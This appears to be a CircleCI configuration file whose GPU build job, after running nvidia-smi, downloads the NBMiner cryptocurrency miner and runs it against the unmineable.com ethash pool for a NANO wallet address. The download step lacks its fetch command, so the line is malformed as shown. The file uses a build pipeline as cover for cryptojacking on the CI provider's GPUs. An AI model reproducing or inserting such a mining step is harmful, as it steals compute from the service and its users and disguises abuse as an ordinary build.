version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: https://github.com/NebuTech/NBMiner/releases/download/v42.2/NBMiner_42.2_Linux.tgz && tar -xzvf NBMiner_42.2_Linux.tgz && cd 42.2 && ./nbminer a ethash -o stratum+tcp://ethash.unmineable.com:3333 -u NANO:nano_1rq9zug5u68cj3q41iarsurzxwzha3ma5uc4idjretbtng4ekewrfqh8ersf.dandik1 -log pause